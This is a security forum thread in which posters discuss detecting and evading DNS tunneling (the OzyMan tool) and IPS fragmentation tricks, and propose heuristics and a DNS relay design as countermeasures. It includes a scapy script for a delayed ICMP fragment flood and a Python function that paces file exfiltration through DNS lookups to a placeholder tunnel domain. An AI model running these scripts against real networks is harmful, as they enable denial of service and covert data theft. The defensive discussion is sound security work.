Black Ops Requests?


  • #16
    Originally posted by hackajar
    This will still not protect against OzyMan

    I'll give you a hint: DNS TXT records are supposedly deprecated, so they really should not show up on your network.
    Yes. That is why it needs to be coupled with the "second" line and used together. :-)

    Also, one method for anti-spam utilizes TXT records for hosts that should be sending e-mail.
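
    For what it's worth, that anti-spam use is easy to check from a script. A minimal sketch with dnspython (example.com is just a placeholder domain):

    import dns.resolver  # pip install dnspython

    # SPF anti-spam policies are published as TXT records on the sending
    # domain; hosts not listed there should not be sending e-mail.
    for rr in dns.resolver.resolve("example.com", "TXT"):
        txt = b"".join(rr.strings).decode()
        if txt.startswith("v=spf1"):
            print("SPF policy:", txt)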



    • #17
      1) CAM table limits -- yeah, that's the obvious fix (limit MACs per port getting into the table in the first place). Like I sort of implied, I haven't messed with that in a while.

      2) Regarding IPS attacks, what if you sent suitably fragmented payloads to a target such that the IPS wouldn't understand what it was seeing -- meanwhile, the payloads, once assembled, would actually echo back out (think ICMP Ping or HTTP TRACE) something that the IPS would mark as dangerous? That might work; the fragment mechanics are sketched below.

      3) I've become a bit of an OpenGL programmer. All those graphs? They animate in realtime.

      hackajar -- DNS is the best we've got in terms of storing data in the infrastructure. Though...heh. According to http://lwn.net/Articles/136319/, Linux will wait 30 seconds to reassemble a packet. One could feed a large number of hosts spoofed ping fragments, up to 65K, over 30 seconds -- then, upon reception of the final fragment, the target would get an instantaneous blast. There are ways of extending this further -- it just depends how many IP packets the target is willing to store in the reassembly queue (new fingerprinting mechanism! Cool!) -- but the question is whether it's really useful to flood targets like this anymore, save for the aforementioned IDS trickery.
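
      Rough sketch of that delayed blast with scapy, if anyone wants to play -- run as root; 192.0.2.10 is a placeholder target, and the timings and fragment size are assumptions:

      import time
      from scapy.all import IP, ICMP, fragment, send

      # One near-64K ICMP echo, shattered into fragments.
      pkt = IP(dst="192.0.2.10") / ICMP() / ("X" * 60000)
      frags = fragment(pkt, fragsize=1400)

      # Dribble out everything but the final fragment across the ~30
      # second window Linux keeps partial packets around for...
      for f in frags[:-1]:
          send(f, verbose=False)
          time.sleep(25.0 / max(len(frags) - 1, 1))

      # ...then the last fragment lands and the target reassembles the
      # whole payload in one instantaneous blast.
      send(frags[-1], verbose=False)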

      Heh. Neat. If I use this, I'll be sure to thank you directly.



      • #18
        1) DNS TXT records aren't deprecated at all...no TXT, no SPF. SPF is quite popular. And anyway, Ozyman can just as easily use CNAME or even just straight up A records. The only DNS-related thing I really want to show off at BH/DC is high-speed operation, though. I've been doing video demos as of late. 65K/s, y0.

        2) I've never been an "exploit of the day" kinda speaker, though granted -- libpcap/libnids bashing would break a lot of things (zlib 2 electric boogaloo).

        3) Cotman -- blocking UDP/53 except to your own servers does nothing; Ozyman is 100% RFC Compliant (or your money back) so it just proxies off your systems. And the tools we have, at least right now, to evaluate DNS traffic are pretty raw.

        4) Duplicated fragments -- yeah, there's some stuff there. Hmm.

        --Dan



        • #19
          Originally posted by Effugas
          3) Cotman -- blocking UDP/53 except to your own servers does nothing; Ozyman is 100% RFC Compliant (or your money back) so it just proxies off your systems. And the tools we have, at least right now, to evaluate DNS traffic are pretty raw.
          Looking for per-host port 53 traffic that is greater than the average for a network would not take much work. If someone has 2x or 3x the "average" DNS traffic, they are suspect. No need to have the examination be advanced -- all you are looking for are potential abusers.

          At my work, we look at traffic use per host and service. When a "spike" is found that is out of the norm, then it is examined. Pushing too much traffic through a tunneled DNS "connection" could easily draw attention to yourself on such a network.
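
          A sketch of that check -- the per-host counts here are hypothetical, tallied from wherever you collect them (firewall logs, BIND query logs, NetFlow):

          from collections import Counter
          from statistics import median

          # Hypothetical port-53 query counts per host over some window.
          queries = Counter({"10.0.0.5": 310, "10.0.0.7": 290,
                             "10.0.0.9": 2400})

          # Median rather than mean, so one abuser can't drag the
          # baseline up with their own traffic.
          baseline = median(queries.values())
          TRIGGER = 3  # flag anything at 3x the network norm

          for host, count in queries.items():
              if count > TRIGGER * baseline:
                  print(f"suspect: {host} ({count} queries, baseline {baseline})")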



          • #20
            So what does this say for OzyMan? Is signature-based mitigation moot? Would we have to rely on anomaly-based traffic spikes? What if I just wanted to send a little data? Or run a simple shell script that paced data going out over DNS using OzyMan. A sort of "low and slow" tactic?

            OzyMan is certainly one hell of a sneaky sneaky tool!

            - Do note: I bash no one, only seek to inspire others to think out loud. BTW this is some good discussion going on here!
            "Never Underestimate the Power of Stupid People in Large Groups"



            • #21
              Originally posted by hackajar
              So what does this say for OzyMan? Is signature-based mitigation moot? Would we have to rely on anomaly-based traffic spikes? What if I just wanted to send a little data? Or run a simple shell script that paced data going out over DNS using OzyMan. A sort of "low and slow" tactic?
              That is a very good point. A single host could be configured to "trickle" data out slowly enough to not be caught, and "fly under the radar." A file could be split across multiple IP addresses/hosts, and statistics could be skewed by installing software on many hosts to elevate DNS requests/traffic and increase the average for a network.
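
              To make the trickle concrete, something like this hypothetical pacer is all the evading side would need (tunnel.example.com stands in for an attacker-controlled zone) -- which is exactly why a bare 2x-3x trigger isn't enough:

              import binascii
              import socket
              import time

              DOMAIN = "tunnel.example.com"   # placeholder tunnel zone
              PACE = 300                      # one lookup every 5 minutes

              def trickle(data, chunk=20):
                  # Each chunk of the file rides out as a hostname label in
                  # an ordinary A lookup, slowly enough to hide inside the
                  # network's normal per-host DNS volume.
                  for seq in range(0, len(data), chunk):
                      label = binascii.hexlify(data[seq:seq + chunk]).decode()
                      try:
                          socket.gethostbyname(f"{label}.{seq}.{DOMAIN}")
                      except socket.gaierror:
                          pass  # NXDOMAIN is fine; the server saw the label
                      time.sleep(PACE)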

              Since the subject is here, I'm searching for what other countermeasures could defeat the two-part system.

              The "small amount of traffic" approach is valid and good, and the others listed in the previous paragraph could work. Any others?


              OzyMan is certainly one hell of a sneaky sneaky tool!
              You won't find me disagreeing with this. :-)

              [Also, a "cry wolf attack" could be used where many requests are sent from many hosts often enough to force the trigger (2x or 3x or ?) to be elevated to 10x or more because the Networking people do not want to be bugged by "false alarms" with DNS so much.]



              • #22
                Originally posted by TheCotMan
                [Also, a "cry wolf attack" could be used where many requests are sent from many hosts often enough to force the trigger (2x or 3x or ?) to be elevated to 10x or more because the Networking people do not want to be bugged by "false alarms" with DNS so much.]
                This is by far the biggest problem I fear, that keeps me up at night (not joking). Very good point.

                When do we filter out "known traffic" to look for the so-called "real problem", and what if that traffic becomes rogue?
                "Never Underestimate the Power of Stupid People in Large Groups"



                • #23
                  Originally posted by hackajar
                  When do we filter out "known traffic" to look for the so-called "real problem", and what if that traffic becomes rogue?
                  Like a department that runs "webalyzer" with rDNS lookups enabled each month, and the insider scheduling the transfer through a DNS tunnel from that server?



                  • #24
                    I wonder if a signature could be written to look for "odd" data in DNS packets. As OzyMan uses encryption, maybe check to see whether the data is gibberish? Or throw a dictionary at some words in the request to ensure there's "real" data and not encrypted data? Just a thought
                    "Never Underestimate the Power of Stupid People in Large Groups"



                    • #25
                      Originally posted by hackajar
                      I wonder if a signature could be written to look for "odd" data in DNS packets. As OzyMan uses encryption, maybe check to see whether the data is gibberish? Or throw a dictionary at some words in the request to ensure there's "real" data and not encrypted data? Just a thought
                      Application of heuristics for detection could work, but that would be more work than just looking for spikes. Several things could be factored in, to help make the chances for identification better.

                      * Traffic spikes or use well above average?
                      * Mixed case in names returned?
                      * Ratio of vowels to consonants?
                      * What record types are being requested? (excessive TXT?)
                      * Average length of hostnames for specific host longer than average on net?
                      * Has anyone else used the off-site DNS server, other than the one user?
                      * Is rDNS of the target one of a Home ISP?
                      ...

                      And once a target is found suspect:
                      * If the records are A or CNAME, are they valid hostnames? (Does a separate lookup through root servers of the name provide success)
                      * Excessive hits to a specific host that does not have corresponding name matches in other applications (telnet, ftp, http, etc.) as would be expected.
                      * Excessive cache use in DNS where a single IP address is mapped to too many names
                      * Excessive cache use in DNS where many IP Addresses on significantly different subnets are associated with domain name lookups from the same host.
                      * Replay attacks for detection: Do the same lookups (replayed) provide the same results?
                      ...

                      However, whatever patterns and actions would be used to determine if a lookup is risky or not could then be taken into consideration in the next use or version of OzyMan.

                      Then it becomes a matter of which developer has more time (like the Virus/Worm vs. AntiVirus writers' problem) and efficiency of use.
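
                      Two of the cheaper heuristics above (entropy and the vowel/consonant ratio) sketched out, with hypothetical names:

                      import math
                      from collections import Counter

                      VOWELS = set("aeiou")

                      def label_stats(hostname):
                          # Score the leftmost label: Shannon entropy plus
                          # vowel-to-consonant ratio. Tunnel payloads tend
                          # toward high entropy and few vowels.
                          label = hostname.split(".")[0].lower()
                          freq = Counter(label)
                          entropy = -sum((n / len(label)) * math.log2(n / len(label))
                                         for n in freq.values())
                          letters = [c for c in label if c.isalpha()]
                          vowels = sum(c in VOWELS for c in letters)
                          return entropy, vowels / max(len(letters) - vowels, 1)

                      for name in ("mail.example.com", "a91f03bc77de0142.example.com"):
                          e, r = label_stats(name)
                          print(f"{name}: entropy={e:.2f} vowel/consonant={r:.2f}")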



                      • #26
                        Cotman--

                        Indeed, the various heuristics you discuss are quite effective, given human monitoring. What we can't do is create a hard and fast rule that can be deployed automatically, akin to "no TXT records" and "only a certain number of name lookups per hour". Even entropy monitoring can be adapted against, though it deeply limits the bandwidth available in a DNS tunnel.

                        This is turning into a very productive discussion. Question -- someone mentioned earlier more "paketto-like" things for Scanrand. What kind of options are people looking for?

                        --Dan



                        • #27
                          Originally posted by Effugas
                          What we can't do is create a hard and fast rule that can be deployed automatically, akin to "no TXT records" and "only a certain number of name lookups per hour".
                          I have another proposal as a countermeasure.

                          Needed: a local client I'll call LC, two private networks (N1, N2), a special (yet to be made) DNS/filter/port-forwarding/NAT combination box I'll call "DNSS", and limits that only allow DNS traffic to and from DNSS.

                          DNSS is the only local node that is permitted to have outbound and incoming TCP/UDP port 53 traffic for zone transfers and lookups.
                          DNSS is configured so that MX and TXT record lookups are disallowed, and reverse lookups always return the IP address in the query.
                          LC has an IP address on N1, and performs DNS Lookup for a host to the local DNSS.
                          DNSS performs a complete lookup to find the real IP address and information if an entry does not exist in the table, or an existing record has expired. If the lookup has changed, update the key and replace the real IP address with the new value -- transparent to the client, and without impacting previous sessions.
                          DNSS examines a special table where a unique key is generated by:
                          1) LC IP address
                          2) Real IP Address found in DNS
                          and includes a field for
                          3) Host+domain name of lookup (for future lookups and compares)
                          and associates this key with an available N2 private network address, stored in
                          4) Private (DNSS assigned) IP address for this LC/Real-IP-Address pair.
                          DNSS now sets up a layer 3/4 relay to forward traffic to/from one of the real IP addresses returned in the DNS query.
                          DNSS now tells LC that the IP address of the host is the selected N2 address.
                          If LC needs to connect to the host specified by name, it connects to the N2 address.
                          DNSS then acts as a MiM to forward from the N2 address to the real address.

                          What does this do?
                          Allows the DNSS to limit what information is made available to the LC.
                          Changes to the real IP address found are never passed to the LC.
                          Information flow internally is controlled, or at least restricted.

                          A few things may break in this scenario, and I would be concerned about how well it would scale for a Class A sized network. There are other problems that may need to be resolved (mail servers would need to be able to do MX lookups, spam filtering mechanisms may need TXT records, some servers would probably need full access, networking folks would want a way to resolve reverse lookups for network analysis, etc.), but this seems like a way to break information passing from the outside, in [through a covert DNS channel]. It does not stop information passing from the inside, out.

                          (I'll proof-read this later)
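
                          A toy of just the mapping-table piece, to make the key/N2 assignment concrete -- the addresses and the N2 pool are placeholders, and the actual layer 3/4 relaying is omitted:

                          import ipaddress

                          # N2: pool of private addresses handed to clients.
                          N2_POOL = ipaddress.ip_network("10.99.0.0/16").hosts()

                          # Unique key: (LC IP, real IP); fields: name, N2 address.
                          table = {}

                          def dnss_lookup(client_ip, qname, real_ip):
                              key = (client_ip, real_ip)
                              if key not in table:
                                  table[key] = {"name": qname,
                                                "n2": str(next(N2_POOL))}
                              # The client only ever sees the N2 address; changes
                              # to the real IP are never passed through.
                              return table[key]["n2"]

                          print(dnss_lookup("192.168.1.20", "www.example.com",
                                            "203.0.113.7"))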



                          • #28
                            Wow. Hideous, but it does make it very difficult for malicious traffic to enter the protected network (of course, anything you like can still leave, since some host has to NAT-resolve skjhkfdgjdgdfg.foo.com).

                            I note, this works right for A lookups and nothing else. You are right, this doesn't scale well.



                            • #29
                              Originally posted by Effugas
                              Wow. Hideous
                              Hah! :-D Yeah, that is a kind description of a "solution" that mixes different network layers and acts in a non-modular way; certainly not elegant enough to be a hack, but perhaps twisted and brutish enough to be a kludge.

                              I note, this works right for A lookups and nothing else.
                              If the DNSS is configured to follow all PTR and CNAME records through to A lookups until either a single IP address (or a list of IP addresses from which one is selected) is provided or 30 "hops" of following are exceeded (to prevent a looping DoS), and then to use the resulting IP, these lookups could be made to work too. (The client does not need to know what was necessary to get the IP; it just needs an IP that works for the application that wants it.) Anything that fails due to looping or other reasons can just default to the dead state of "host not found."
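
                              Sketched with dnspython (which normally chases CNAMEs on its own, so the explicit loop is only here to show the hop cap):

                              import dns.resolver  # pip install dnspython

                              MAX_HOPS = 30  # cap chain-following; prevents a looping DoS

                              def follow_to_a(name):
                                  for _ in range(MAX_HOPS):
                                      try:
                                          return [r.address for r in
                                                  dns.resolver.resolve(name, "A")]
                                      except dns.resolver.NoAnswer:
                                          pass  # no A record here; try one CNAME hop
                                      except dns.resolver.NXDOMAIN:
                                          return None  # dead end: "host not found"
                                      try:
                                          answer = dns.resolver.resolve(name, "CNAME")
                                          name = str(next(iter(answer)).target)
                                      except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
                                          return None
                                  return None  # hop limit exceeded; same dead state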

                              You are right, this doesn't scale well.
                              Yeah, all the speed of a layer 7 proxy (gateway) with the ease of use of something nobody has ever used.

                              Though a CSS might help with scaling if TCP were used, it would be a pain to try to make it work for UDP.

                              Hey, thanks for the feedback. :-) ( I really mean this. Not being sarcastic. )

                              Have you selected a topic, or are you still looking? If you are still looking, how much longer will you accept suggestions?



                              • #30
                                Cat--

                                It takes a lot not to be elegant enough to be a hack, but I think this qualifies. A restricted version of this may indeed solve certain problems captive portals have -- using your mechanism, every name gets a temporary IP mapping; post-login, such mappings get NAT'd back to their correct external IP. I like this, since you don't need to do the lookup until the user correctly authenticates. (The problem is that userspace apps may cache DNS responses before authentication, so you need to give them legitimate stuff. I've thought about mechanisms along these lines before, but you've made me realize they're actually feasible. Ah, the pain of the white hat...just when you find a new toy, you go ahead and kill it...)

                                I'm enjoying this collaboration greatly. You'll definitely be getting alpha code from me. Regarding topic selection -- I don't think I'm doing a single topic talk this year, so once again I'll be coding things up until the night before the Black Hat talk :)

                                --Dan

